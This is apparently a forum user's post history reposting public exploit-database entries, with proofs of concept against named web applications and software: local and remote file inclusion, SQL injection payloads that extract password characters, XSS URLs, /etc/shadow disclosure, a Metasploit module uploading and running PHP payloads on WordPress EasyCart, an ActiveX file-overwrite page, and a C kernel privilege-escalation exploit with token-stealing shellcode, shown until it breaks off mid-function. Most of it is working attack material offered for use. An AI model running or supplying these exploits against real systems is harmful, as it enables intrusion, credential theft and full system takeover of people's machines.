
Everything posted by HireHackking
-
StaMPi - Local File Inclusion
# Exploit Title: StaMPi - Local File Inclusion
# Google Dork: "Designed by StaMPi" inurl:fotogalerie.php
# Date: 16/2/15
# Author : e . V . E . L
# Contact: waleed200955@hotmail.com

PoC:
http://site.com/path/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00
-
u5CMS 3.9.3 - 'thumb.php' Local File Inclusion
u5CMS 3.9.3 (thumb.php) Local File Inclusion Vulnerability

Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache.

Desc: u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when input passed thru the 'f' parameter to thumb.php script is not properly verified before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                             @zeroscience

Advisory ID: ZSL-2015-5224
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5224.php

29.12.2014

---

GET /u5cms/thumb.php?w=100&f=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
GET /u5cms/thumb.php?w=100&f=/windows/win.ini HTTP/1.1
-
Softbiz Recipes Portal Script - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/49051/info

Softbiz Recipes Portal script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/[path]/admin/index.php?msg=[XSS]
http://www.example.com/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS]
http://www.example.com/[path]/signinform.php?errmsg=[XSS]
http://www.example.com/[path]/msg_confirm_mem.php?errmsg=[XSS]
-
BlueSoft Banner Exchange - 'referer_id' SQL Injection
source: https://www.securityfocus.com/bid/49091/info

BlueSoft Banner Exchange is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/signup.php?referer_id=1[SQLi]
-
Search Network 2.0 - 'query' Cross-Site Scripting
source: https://www.securityfocus.com/bid/49064/info

Search Network is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Search Network 2.0 is vulnerable; other versions may also be affected.

http://www.example/demo/search.php?action=search_results&query=[XSS Attack]
-
OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/49090/info

OpenEMR is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

OpenEMR 4.0.0 is vulnerable; other versions may also be affected.

http://www.example.com/openemr/interface/main/calendar/index.php?tplview='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/calendar/index.php?pc_category='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/calendar/index.php?pc_topic='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?sortby="<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?sortorder="<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?showall=no&sortby=users%2elname&sortorder=asc&begin=724286<">
-
BlueSoft Rate My Photo Site - 'ty' SQL Injection
source: https://www.securityfocus.com/bid/49092/info

BlueSoft Rate My Photo Site is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?cmd=10&ty=2[SQLi]
-
Adobe Flash Media Server 4.0.2 - Null Pointer Dereference Remote Denial of Service
source: https://www.securityfocus.com/bid/49103/info

The Adobe Flash Media Server is prone to a remote denial-of-service vulnerability.

Successful exploits will allow attackers to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed.

http://www.example.com:1111/?%
-
Fork CMS 3.8.5 - SQL Injection
[CVE-2015-1467] Fork CMS - SQL Injection in Version 3.8.5
----------------------------------------------------------------

Product Information:

Software: Fork CMS
Tested Version: 3.8.5, released on Wednesday 14 January 2015
Vulnerability Type: SQL Injection (CWE-89)
Download link to tested version: http://www.fork-cms.com/download?release=3.8.5

Description:

Fork CMS is dedicated to creating a user friendly environment to build, monitor and update your website. We take great pride in being the Content Management System of choice for beginners and professionals. We combine this grand vision with the latest technological innovations to allow developers, front-end developers and designers to build kick-ass websites. This makes Fork CMS next in line for world domination. (copied from http://www.fork-cms.com/features)

----------------------------------------------------------------

Vulnerability description:

When an authenticated user is navigating to "Settings/Translations" and is clicking on the button "Update Filter" the following GET-request is sent to the server:

http://127.0.0.1/private/en/locale/index?form=filter&form_token=408d28a8cbab7890c11b20af033c486b&application=&module=&type%5B%5D=act&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value=

The parameter language[] is prone to boolean-based blind and stacked queries SQL-Injection. With the following payload a delay can be provoked in the request of additional 10 seconds:

http://127.0.0.1/private/en/locale/index?form=filter&form_token=68aa8d273e0bd95a70e67372841603d5&application=&module=&type%5B%5D=act%27%2b(select%20*%20from%20(select(sleep(10)))a)%2b%27&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value=

Also the parameters type[] are prone to SQL-Injection.

----------------------------------------------------------------

Impact:

Direct database access is possible if an attacker is exploiting the SQL Injection vulnerability.

----------------------------------------------------------------

Solution:

Update to the latest version, which is 3.8.6, see http://www.fork-cms.com/download.

----------------------------------------------------------------

Timeline:

Vulnerability found: 3.2.2015
Vendor informed: 3.2.2015
Response by vendor: 3.2.2015
Fix by vendor: 3.2.2015
Public Advisory: 4.2.2015

----------------------------------------------------------------

Best regards,
Sven Schleier
-
Chamilo LMS 1.9.8 - Blind SQL Injection
# Exploit Title: Chamilo LMS 1.9.8 Blind SQL Injection
# Date: 06-12-2014
# Software Link: http://www.chamilo.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

Database::escape_string() function is used to sanitize data but it will work only in two situations: "function_output" or 'function_output'. There are a few places where this function is used without quotation marks.

http://security.szurek.pl/chamilo-lms-198-blind-sql-injection.html

2. Proof of Concept

For this exploit you need teacher privilege (api_is_allowed_to_edit(false, true)) and at least one forum category must exist (get_forum_categories()).

<form method="post" action="http://chamilo-url/main/forum/?action=move&content=forum&SubmitForumCategory=1&direction=1&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1)">
    <input type="hidden" name="SubmitForumCategory" value="1">
    <input type="submit" value="Hack!">
</form>

For second exploit you need administrator privilege (there is no CSRF protection):

http://chamilo-url/main/reservation/m_category.php?action=delete&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1)

Those SQL will check if first password character user ID=1 is "d".

3. Solution:

Update to version 1.9.10
https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues
-
WordPress Plugin eShop 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/49117/info

eShop plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

eShop 6.2.8 is vulnerable; other versions may also be affected.

http://www.example.com/wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-admin/admin.php?page=eshop-orders.php&view=1&action=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-admin/admin.php?page=eshop-orders.php&viewemail=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
-
WordPress Plugin WP EasyCart - Unrestricted Arbitrary File Upload (Metasploit)
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress WP EasyCart Unrestricted File Upload',
      'Description'     => %q{
        WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw
        that allows a remote attacker to execute arbitrary PHP code. This flaw exists
        because the /inc/amfphp/administration/banneruploaderscript.php script does
        not properly verify or sanitize user-uploaded files. By uploading a .php file,
        the remote system will place the file in a user-accessible path. Making a
        direct request to the uploaded file will allow the attacker to execute the
        script with the privileges of the web server.

        In versions <= 3.0.8 authentication can be done by using the WordPress
        credentials of a user with any role. In later versions, a valid EasyCart
        admin password will be required that is in use by any admin user. A default
        installation of EasyCart will setup a user called "demouser" with a preset
        password of "demouser".
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Kacper Szurek',                    # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>'   # Metasploit module
        ],
      'References'      =>
        [
          ['OSVDB', '116806'],
          ['WPVDB', '7745']
        ],
      'DisclosureDate'  => 'Jan 08 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['wp-easycart', {}]],
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']),
        OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']),
        OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.18)', 'demouser']),
        OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false])
      ], self.class)
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def ec_password
    datastore['EC_PASSWORD']
  end

  def ec_password_is_hash
    datastore['EC_PASSWORD_IS_HASH']
  end

  def use_wordpress_authentication
    username.to_s != '' && password.to_s != ''
  end

  def use_ec_authentication
    ec_password.to_s != ''
  end

  # The uploader expects the MD5 of the EasyCart password as the request id
  def req_id
    if ec_password_is_hash
      return ec_password
    else
      return Rex::Text.md5(ec_password)
    end
  end

  def generate_mime_message(payload, date_hash, name, include_req_id)
    data = Rex::MIME::Message.new
    data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
    data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id
    data
  end

  def setup
    if !use_wordpress_authentication && !use_ec_authentication
      fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
    end

    super
  end

  def exploit
    vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
    vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication

    if use_wordpress_authentication && use_ec_authentication
      print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...")
    end

    if use_wordpress_authentication
      print_status("#{peer} - Authenticating using #{username}:#{password}...")
      cookie = wordpress_login(username, password)
      if !cookie
        if use_ec_authentication
          print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
        else
          fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
        end
      else
        print_good("#{peer} - Authenticated with WordPress")
      end
    end

    print_status("#{peer} - Preparing payload...")
    payload_name = Rex::Text.rand_text_alpha(10)
    date_hash = Rex::Text.md5(Time.now.to_s)
    uploaded_filename = "#{payload_name}_#{date_hash}.php"
    plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
    uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
    payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
    data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)

    print_status("#{peer} - Uploading payload to #{payload_url}")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uploader_url,
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s,
      'cookie' => cookie
    )

    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
    vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200

    print_status("#{peer} - Executing the payload...")
    register_files_for_cleanup(uploaded_filename)
    res = send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
    if !res.nil? && res.code == 404
      print_error("#{peer} - Failed to upload the payload")
    else
      print_good("#{peer} - Executed payload")
    end
  end
end
-
LG DVR LE6016D - Remote File Disclosure
----------------------------------------------------------------------
Title        : LG DVR LE6016D - Remote File Disclosure Vulnerability (0day)
CVE-ID       : none
Product      : LG
Affected     : All versions
Impact       : Critical
Remote       : Yes
Product link : http://www.lgecommercial.com/security-en/products/analog-product/analog-dvr/lg-LE6016D
Reported     : 10/02/2015
Author       : Yakir Wizman, yakir.wizman@gmail.com

Vulnerability description:
----------------------------------------------------------------------
No authentication (login) is required to exploit this vulnerability.

The LG DVR application is prone to a remote file disclosure vulnerability. An attacker can exploit this vulnerability to retrieve stored files on the server such as '/etc/passwd' and '/etc/shadow' by using a simple URL request made from a browser.

Moreover, an attacker may be able to compromise encrypted login credentials or retrieve the device's administrator password, allowing them to directly access the device's configuration control panel.

Proof of concept:
----------------------------------------------------------------------
The following simple URL request will retrieve the '/etc/shadow' file:

http://127.0.0.1:1234/etc/shadow

~eof.
-
phpWebSite - 'page_id' Cross-Site Scripting
source: https://www.securityfocus.com/bid/49176/info

phpWebSite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/mod.php?mod=userpage&page_id=[XSS]
-
SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/49160/info

SurgeFTP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

SurgeFTP 23b6 is vulnerable; other versions may also be affected.

http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&last="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&class_name="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=report_file&domainid=0&filter="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=user_admin&domainid="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid="<script>alert('XSS');</script>
-
PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/49138/info

PHP Flat File Guestbook is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[path]/ffgb_admin.php?book_id=http://shell?
-
phpList 2.10.x - Security Bypass / Information Disclosure
source: https://www.securityfocus.com/bid/49188/info

PHPList is prone to a security-bypass vulnerability and an information-disclosure vulnerability.

An attacker can exploit these issues to gain access to sensitive information and send arbitrary messages to registered users. Other attacks are also possible.

http://www.example.com/lists/?p=forward&uid=VALID_UID&mid=ID
http://www.example.com/lists/?p=forward&uid=foo&mid=ID
-
awiki 20100125 - Multiple Local File Inclusions
source: https://www.securityfocus.com/bid/49187/info

awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

awiki 20100125 is vulnerable; other versions may also be affected.

http://www.example.com/awiki/index.php?page=/etc/passwd
http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd
-
WordPress Plugin Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/49193/info

The Fast Secure Contact Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Versions prior to Fast Secure Contact Form 3.0.3.2 are vulnerable.

http://www.example.com/wp-content/plugins/si-contact-form/captcha/test/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
-
WordPress Plugin WP-Stats-Dashboard 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/49197/info

WP-Stats-Dashboard is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

WP-Stats-Dashboard 2.6.5.1 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?icon=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php?onchange=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php?submenu[%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]
-
StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite
source: https://www.securityfocus.com/bid/49192/info

StudioLine Photo Basic ActiveX is prone to an arbitrary-file-overwrite vulnerability.

Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).

StudioLine Photo Basic 3.70.34.0 is vulnerable; other versions may also be affected.

<html>
<object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
    arg1="FilePath\File_name_to_corrupt_or_create"
    arg2=True
    target.EnableLog arg1 ,arg2
End Sub
</script>
</html>
-
SoftSphere DefenseWall FW/IPS 3.24 - Local Privilege Escalation
/*
Exploit Title    - SoftSphere DefenseWall FW/IPS Arbitrary Write Privilege Escalation
Date             - 10th February 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - http://www.softsphere.com
Tested Version   - 3.24
Driver Version   - 3.2.3.0 - dwall.sys
Tested on OS     - 32bit Windows XP SP3
OSVDB            - http://www.osvdb.org/show/osvdb/117996
CVE ID           - CVE-2015-1515
Vendor fix url   -
Fixed Version    - no fix
Fixed driver ver -
*/

#include <stdio.h>
#include <conio.h>      /* getch() */
#include <windows.h>

#define BUFSIZE 4096

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
    HANDLE Section;
    PVOID  MappedBase;
    PVOID  Base;
    ULONG  Size;
    ULONG  Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR   ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);

typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval);

typedef void (*FUNCTPTR)();

// Windows XP SP3
#define XP_KPROCESS 0x44  // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN    0xc8  // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID     0x84  // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS  0x88  // Offset to ActiveProcessLinks _EPROCESS struct

BYTE token_steal_xp[] =
{
    0x52,                                                    // push edx                     Save edx on the stack
    0x53,                                                    // push ebx                     Save ebx on the stack
    0x33,0xc0,                                               // xor eax, eax                 eax = 0
    0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                      // mov eax, fs:[eax+124h]       Retrieve ETHREAD
    0x8b,0x40,XP_KPROCESS,                                   // mov eax, [eax+XP_KPROCESS]   Retrieve _KPROCESS
    0x8b,0xc8,                                               // mov ecx, eax
    0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                       // mov ebx, [eax+XP_TOKEN]      Retrieves TOKEN
    0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                     // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
    0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                     // sub eax, XP_APLINKS         | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
    0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,    // cmp [eax+XP_UPID], 4        | Compares UniqueProcessId with 4 (System Process)
    0x75,0xe8,                                               // jne ----
    0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                       // mov edx, [eax+XP_TOKEN]      Retrieves TOKEN and stores on EDX
    0x8b,0xc1,                                               // mov eax, ecx                 Retrieves KPROCESS stored on ECX
    0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                       // mov [eax+XP_TOKEN], edx      Overwrites the TOKEN for the current KPROCESS
    0x5b,                                                    // pop ebx                      Restores ebx
    0x5a,                                                    // pop edx                      Restores edx
    0xc2,0x08                                                // ret 8                        Away from the kernel
};

DWORD HalDispatchTableAddress()
{
    _NtQuerySystemInformation NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION pModuleInfo;
    DWORD HalDispatchTable;
    CHAR kFullName[256];
    PVOID kBase = NULL;
    LPSTR kName;
    HMODULE Kernel;
    FUNCTPTR Hal;
    ULONG len;
    NTSTATUS status;

    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation)
    {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return -1;
    }

    // First call only retrieves the required buffer length
    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
    if (!status)
    {
        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
        return -1;
    }

    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
    if (pModuleInfo == NULL)
    {
        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
        return -1;
    }

    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);

    // The first module entry is the kernel image
    memset(kFullName, 0x00, sizeof(kFullName));
    strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
    kBase = pModuleInfo->Module[0].Base;
    printf("[i] Kernel base name %s\n", kFullName);

    kName = strrchr(kFullName, '\\');
    Kernel = LoadLibraryA(++kName);
    if (Kernel == NULL)
    {
        printf("[-] Failed to load kernel base\n\n");
        return -1;
    }

    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
    if (Hal == NULL)
    {
        printf("[-] Failed to find HalDispatchTable\n\n");
        return -1;
    }

    printf("[i] HalDispatchTable address 0x%08x\n", Hal);
    printf("[i] Kernel handle 0x%08x\n", Kernel);
    printf("[i] Kernel base address 0x%08x\n", kBase);

    // Rebase the user-mode address onto the kernel's real load address
    HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);

    if (!HalDispatchTable)
    {
        printf("[-] Failed to calculate HalDispatchTable\n\n");
        return -1;
    }
    return HalDispatchTable;
}

int GetWindowsVersion()
{
    int v = 0;
    DWORD version = 0, minVersion = 0, majVersion = 0;

    version = GetVersion();
    minVersion = (DWORD)(HIBYTE(LOWORD(version)));
    majVersion = (DWORD)(LOBYTE(LOWORD(version)));

    if (minVersion == 1 && majVersion == 5) v = 1;  // Windows XP
    if (minVersion == 1 && majVersion == 6) v = 2;  // Windows 7
    if (minVersion == 2 && majVersion == 5) v = 3;  // Windows Server 2003
    return v;
}

void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
        printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
        return;
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}

int main(int argc, char *argv[])
{
    _NtQueryIntervalProfile NtQueryIntervalProfile;
    LPVOID input[1] = {0};
    LPVOID addrtoshell;
    HANDLE hDevice;
    DWORD dwRetBytes = 0;
    DWORD HalDispatchTableTarget;
    ULONG time = 0;
    char devhandle[MAX_PATH];

    printf("-------------------------------------------------------------------------------\n");
    printf("   SoftSphere DefenseWall FW/HIPS (dwall.sys) Arbitrary Write EoP Exploit      \n");
    printf("                      Tested on Windows XP SP3 (32bit)                         \n");
    printf("-------------------------------------------------------------------------------\n\n");

    if (GetWindowsVersion() == 1)
    {
        printf("[i] Running Windows XP\n");
    }
    if (GetWindowsVersion() == 0)
    {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }

    sprintf(devhandle, "\\\\.\\%s", "dwall");

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
        return -1;
    }

    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (addrtoshell == NULL)
    {
        printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);

    memset(addrtoshell, 0x90, BUFSIZE);
    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    }
    else
    {
        printf("[+] Open %s device successful\n", devhandle);
    }

    HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

    input[0] = addrtoshell;  // input buffer contents gets written to our output buffer address
    printf("[+] Input buffer contents %08x\n", input[0]);

    printf("[~] Press any key to send Exploit . . .\n");
    getch();

    DeviceIoControl(hDevice, 0x00222000, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
    printf("[+] Buffer sent\n");
    CloseHandle(hDevice);

    printf("[+] Spawning SYSTEM Shell\n");
    NtQueryIntervalProfile(2, &time);  // triggers the overwritten HalDispatchTable+4 pointer
